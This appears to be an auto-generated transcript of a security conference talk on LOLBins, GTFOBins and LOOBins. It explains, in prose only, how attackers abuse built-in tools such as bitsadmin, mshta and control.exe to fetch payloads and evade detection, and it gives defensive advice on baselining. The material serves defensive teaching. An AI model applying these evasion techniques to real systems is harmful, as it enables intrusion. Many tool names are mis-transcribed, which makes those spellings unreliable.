I Make Them Good Processes Go Bad: Deep Dive on LOLbins & GTFObins

good afternoon everyone I know uh after lunch presentations usually are a little bit sluggish um so welcome to I make them good processes go bad I was going to play the audio uh you know I make them good yeah no I'm not going to sing it um I might mess with YouTube filters and stuff so we're gonna Deep dive on walbins and gtf opens um really quick who here knows what a ceyb cya slide is what that stands for okay um if you don't know what it is it's just legal disclaimer stuff I have to say it because I don't want you guys to think that this is any of the positions of my current or former employers this is all me um this is all my personal opinion I want to tell you guys just like when it comes to hacking don't attempt anything in this presentation without prior authorization especially when it comes to systems you might not own um make sure you vet everything with the proper legal HR management blah blah blah keep your ethics high and don't become what you are defending against I always like to the synopsis slide just in case people have an idea of what this presentation is about and then it really winds up not being it I don't know how many of you guys are fans of the office when Pam winds up in the wrong class and the teacher's just like nah sit down so that's kind of what I include this slide before is it's you know okay I'm in the wrong presentation well you guys have time to leave now so we're going to talk about wellbins dtfo bins and wall bins does anybody know what an l l o o l bin is yeah this one's pretty new but we're going to be talking about that so a little bit of the history of them um I like to include uh explain like I'm five because I understand that there's going to be different levels of experience with this stuff so I always start off with like an explain like I'm five and then we move on from the attacker and Defender perspective anything that's commonly abused and then some real world examples and some wrap-ups so a little bit about me I'm an advanced threat Hunter if you really want to know where you can look me up on LinkedIn but I don't like to like advertise it because it's really easy to find out where I work and I like to present as a subject matter expert it just makes things a little bit easier for me from like a legal compliance standpoint stuff I do a lot of research on the side um if you guys meet up with my boyfriend he's here he has to drag me away from computer sometimes because I spend way too much time on it but I like to do a lot of research and because of that research you guys are going to see a wall bin that has not been disclosed to the laubins project today about a server of 300 people on Discord know about it so you guys are getting a sneak peek about that thanks to research I have some certifications you know like the cisp Azure fund rentals whatever I am in the top one percent of try Hackney and I'm currently on the 600 day streak and if anybody knows how to break streaks please help me because I don't know how to break this without feeling terrible about myself pounds but yeah so a member of infragard I'm also on the technology Advisory Board of Grand Island I like to box I box out of casels in Niagara Falls if you guys want to actually try like an old school boxing routine come check me out itself I recently did earn my black belt out of there and kickboxing too so don't don't mess with the nerd and then I also do a lot of rocking um and like a corporate liaison for the Kia Memorial Market which is a local charity here that helps veterans in need when it comes to like you know food or assistance and stuff like that so we're getting on to why you're actually here so who knows what a law bin is in my area yep do you know what it does or it's a demand already exists generally you know that Badness yeah exactly so the actual definition are executables that are part of an operating system that can be exploited for an attack in my opinion anything could be a love in GTFO been Walden if you try hard enough probably which is what I'm finding with my research anyways so there are a number of different projects that actually track this stuff and we will go through this stuff and my pointer actually is showing up a little bit so while Ben's again it's windows and yep that stands for living off the land binaries like you explained GTFO bins I was always like kind of concerned on how to like approach this one because I'm sure everybody knows what GTFO stands for and how do I actually say it in a presentation so we're just going to go with GTFO bins and those are Linux binaries and then low bins stands for living off the Orchard binaries and that's a brand new project that involves Mac OS and I've seen quite a few Mac devices around here um so this is a good one to get to know and I will be showing you the website in a little bit so before we get really rolling in it there's a history behind it so living off the land actually came from a presentation at Derby con did anybody have like the opportunity to go to Derby con before it closed I'm really jealous Derby con was run by trusted set so living off the land first kind of appeared in 2013. uh Christopher Campbell and Matthew Graber at Derby Town 3.0 they were talking about pen testing though so they were talking about as a pen tester how do we get away with some of our attacks and that's where living off the land actually started to churn the masses I guess but for years there were so many different names to it um my favorite name is misplaced trust binaries so that's what people were calling these wall bins before they were law bins so surrogate programs proxy binaries all that sort of stuff and then as always somebody on Twitter which infosec Twitter if you guys aren't a part of I'm not going to get into the politics of Twitter I have a mastodon I have a lurk or Twitter it's where I find my information so somebody at a point was just like hey can we just come up with a name for these things so we're not all calling it something different and so the best way to do that was a Twitter poll so with 40 no 34 everybody decided on surrogate binaries but as Twitter happens that didn't stick because somebody was like Hey I propose living off the land in binaries because I like that name and then out of our Mo who had heard that from Philip go was like hey why don't we do living off the land binaries instead of surrogate binaries and if you don't know adver mo he's uh currently works for trusted sec I do believe he is kind of the founder of the projects more or less so he proposed that idea and in Twitter cyber security fashion there was another poll and so this poll eventually put it to rest there was 49 votes and a nice percentage and history was made and unlike many cyber security professionals who go hey this is a really good idea he actually picked it up you know how many times have you guys in your company go hey we should do this and then nobody implements it because nobody wants to take on the work so Kudos he ran the final poll he spread Walden's far and wide and then he started documenting it in the Walden's project so that's a cool story right but what do you actually mean by executables that are part of an operating system that can be supported in an attack what exactly are they and this is where we get into the explain like I'm five situation because if I can't explain it properly to a five-year-old then I'm not doing my job very well so here to help me explain is everybody's favorite paper clip clippy wait a minute I don't own the rights to clippy I might get in trouble funniest Clipper to explain um I actually tried a whole bunch of ways to get AI to generate some version of a knockoff clippy for me and it didn't work out very well it was really scary um I'll post a couple of those really creepy examples later on but so here's Clipper to explain yes I made him in Ms paint and it was fun so here's clipper he is very helpful he's built into your operating system he's here to help you with all your needs you can trust him because he was there with the system security knows him and then unfortunately also this malware knows that he's a thing but if the malware executes then Security will most likely catch on to him so what's malware to do hey Clipper will you help me uh I'm just a normal process and it's not Clippers I like it's not his prerogative to decide what's normal or what's not he's just doing what's being asked of him so he's here to help with all the technical needs so by executing through this legitimate process he kind of avoids detection and I put the asterisks there because there are security tools out there that can detect this sort of stuff so I'm not saying like if you instantly work through allow bins you won't be detected but security is like huh that's weird but it's Clippers so that's kind of fine um and then the malware is able to execute so I know that was a very very basic idea of it but again I don't know what level we're working with here some people might have never heard of Alden before but the same goes for dtfo bins and all bins it's all the same concept it's just depending on which operating system you're working through so again they have legitimate libraries I included a couple screenshots just like trying to like familiarize with what we might be working with so these programs have legitimate uses like for operating supports so you can't just shut them off instead of packaging everything together some malware providers like to use these so it makes their malware smaller and it makes it a little bit easier to smuggle in so instead of like hey I'll do a like a fishing campaign you know if they manage to get into a system then they might use something else to call their malware in there's a whole bunch of different ways that you can go about this the lists are quite long now in the projects so it's kind of it's kind of difficult to stay up to date but that's why you know thank you to the adverbose of the world who keep these projects up to date so we're going to clarify what it is because there's a lot of misconceptions about what actually is a wall then and it's starting to expand a little bit but traditionally it was a signed file or binary native to the operating system or could be downloaded from the official site so what I mean by that is how many of you guys are familiar with like Microsoft Suite where it might have like a PS exec or something like that sometimes I thought natively on operating systems sometimes you have to download that separately and bring it in I know a lot of Corporations who do that they kind of install more of a stripped operating system without all the fancy developer tools and then people download them later anyways so that was the original intent and then they have to have an unexpected functionality so when you think about that if I do a net use to map a network drive that's what it's used for so that's not all been but if I use like mshta which is used to service HT HTA files but it can also download a remote payload that's considered a login because it's not natively used to download payloads the functionality is also kind of like focused on what threat actors and red teams can use so if it's something that like you know you're not going to see a threat actor use a particular Albin for a reason then it's not technically a law bed but interesting functions by definition can be executing code different file operations such as read write execute upload download that sort of stuff so we're gonna check out these sites really quick because sometimes it helps to see them rather than me just talk about them so please bear with the transition really quick my mouse fell asleep okay so this is the wild bus project and it's actually going to be kind of difficult for me to navigate from here but so each of these is a binary that you can find on Windows we might just stick with lobbins for now because Windows is most common but when you go in you see all these different functions so what it can be used for some of them have many functions those are ones you want to be a little bit more careful about and then each of these is also mapped to miter attack so I know a lot of management a lot of compliance groups audit they'd like to see some sort of framework when it comes to this sort of stuff so if we just uh what's one of my favorite ones um let's just go to control.exe so when you go into each of these it gives you a definition of what it is where it can be found different resources from like the researchers on how it's been abused and then there's also these things called detections and sigma rules sometimes you'll see stuff like elastic it's all just different detections that the blue TV uses to you know and get rid of this stuff so this is the actual Walden's aka the unexpected functionality so it can be used to execute alternative data streams and this here is an example of it so typically if you see something like this in the logs where it's like control.exe you typically see that as a standalone but when it's paired with this sort of like Fast file calling another binary that's what the actual malicious execution of it is so it can be used to evade defenses to hide you know persistent mechanisms and stuff like that thank you I lost money all right we're gonna move back this way so I'll show you gtf opens the same when it comes to Linux binaries we have the same situation where you have the binary that's already built into Linux 7-Zip what it's meant to do and then how you can abuse it here's law bins which is the Mac OS version and this one's relatively brand new so if you guys are like mac users and you're really knowledgeable with the different math binaries consider actually doing research and submitting it to the orchard project because like I said it's brand new thread actors have 10 compromise Max I know everybody likes to think that Mac OS is like super hard and secure nobody can get past it but they're slowly turning their attention to it so this is again the math project hmm all right so why do threat actors use them why do red teamers use them well they're kind of stealthy and I mean how many blue teamers out there actually know their environment to a t or know every single binary that exists on a system and on top of all that knows what that binary is supposed to look like in their logs that's kind of a tall ask so they like to use these built-in programs to carry out malicious stuff but take advantage of it by not having to package it in with their code makes it a little bit more lightweight makes it easier to abuse the system more or less and again it makes it harder for security systems to detect them and on top of it all when it comes to like programs it's really easy like okay we don't want TeamViewer in our environment we'll just block it well you can't exactly block assert util you can't exactly block command like you can't necessarily block all this sort of stuff so they know it's going to be there if they can figure out what sort of operating system you're running tools are already there so it makes it makes it really fun for them and then makes it really terrible for the Defenders so how do they ID and exploit how does a login become a law then research lots and lots and lots of research um so like I said fingerprinting and operating system gives them a leg up and then all you have to do is kind of like look at the same sites you know they're not just for blue teamers if they look at the website and are like okay well I've never known I didn't know that this binary existed it's right then and there so I like this meme in particular RDP isn't a wall bin but it's sort of the same concept where blue teamers are looking for the bad stuff okay like blue teamers are looking for a Cobalt strike they're looking for you know like a Bitcoin miner they're not looking for RDP necessarily because RDP is used throughout your environment I mean even if you were like hey let's look up who's already peeing where if you look up like rdpclip.exe the amount of logs you're going to get back are going to be terrible and obviously you can kind of use context if you know your environment well enough like okay maybe a support desk technician should be using RDP but why is this marketing Direct director so again it's not super straightforward when it comes to looking for this sort of stuff but that's a kind of a good meme to like showcase you know why it's so difficult so let's look at an attack really quick um I chose bit admin because it's probably one that you guys should be aware of so it's command line tool where you can download stuff you can update jobs and when I was first looking for this in our environment I was like okay nobody should be using it it's probably not that common and lo and behold people were using it so what happens typically with a malicious actor is they will come up with some sort of drop file like a bat file or a MK file which downloads another payload and I don't know if you're going to be able to see this text really well but they use bits admin to transfer basically the payload out of this linked file to call a Stager and again like we said with this admin that's kind of its purpose so this one kind of starts falling into a little bit deeper of a definition of what a Walden actually is so but that's admin traditional software you know you can probably block typical stuff with like a proxy but how many of you guys are blocking like a command shell through your proxy you know you're probably using typical like Chrome or Firefox you have your proxy blocks there but not through command line so bits admin will call the malicious payload it'll download stuff and lo and behold you have a whole bunch of Badness um and typically they'll use some sort of law bin to either call an encryption process which is what happens with ransomware as there is an encrypt dll which is another already built-in product in like Microsoft but or it could do a whole bunch of other Badness like this one calls an interpreter which if you guys aren't looking for an interpreter if you see something like that that's not analytics environment where you typically intend to see it like you know you're red team using it then uh that's that's another one you want to block so this all sounds terrible for The Blue Team what can we do um Baseline figure out what's normal in your environment there was a lot of wall bins there are a lot of GTFO bins there are a lot of low bins listed on that website it's going to take a while but what you could do is if you have any sort of Windows process logs if you have an EDR system if you have any of that stuff just stop throwing them in and figure out which ones you never see and if you never see them then just write a detection like hey this should never happen in our environment you're going to hit a lot of work unfortunately like I said there's there's processes that get called all the time there are a lot of executables that get used all the time if you want to you can probably start carving those out bio care developers are allowed to use that our system Engineers are allowed to use that um it's it's a lot of work but trust me it's worth it in the long run and then if you don't know figure out what the existing features are with a product so like let's just say um X wizard so X wizard has a whole bunch of different products or different features you can run like different flags maybe it's normal to see a whack s or a wax or I'm just making these off the top of my head you'll have to go and look at the official Microsoft documentation and that's my face when I look at the official Microsoft documentation so I'm I apologize right now then and there but so if you see stuff that's typically normal like okay it typically runs in this fashion it's a scripted job that we can whitelist if it's anything else then that might be bad so this is the of